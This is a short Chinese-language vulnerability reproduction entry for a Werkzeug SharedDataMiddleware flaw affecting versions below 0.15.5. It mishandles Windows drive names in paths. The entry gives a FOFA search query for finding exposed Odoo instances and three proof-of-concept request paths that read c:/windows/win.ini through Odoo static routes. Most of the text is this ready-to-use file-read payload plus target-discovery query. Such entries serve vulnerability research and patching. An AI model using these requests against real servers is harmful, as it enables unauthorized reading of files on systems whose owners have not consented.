漏洞描述 在0.15.5之前的Pallets Werkzeug中,shareddatmiddleware错误处理了Windows路径名中的驱动器名。 漏洞影响 小于 Werkzeug 0.15.5 FOFA title=“Odoo” 漏洞复现 Poc: /base/static/c:/windows/win.ini /base_import/static/c:/windows/win.ini /web/static/c:/windows/win.ini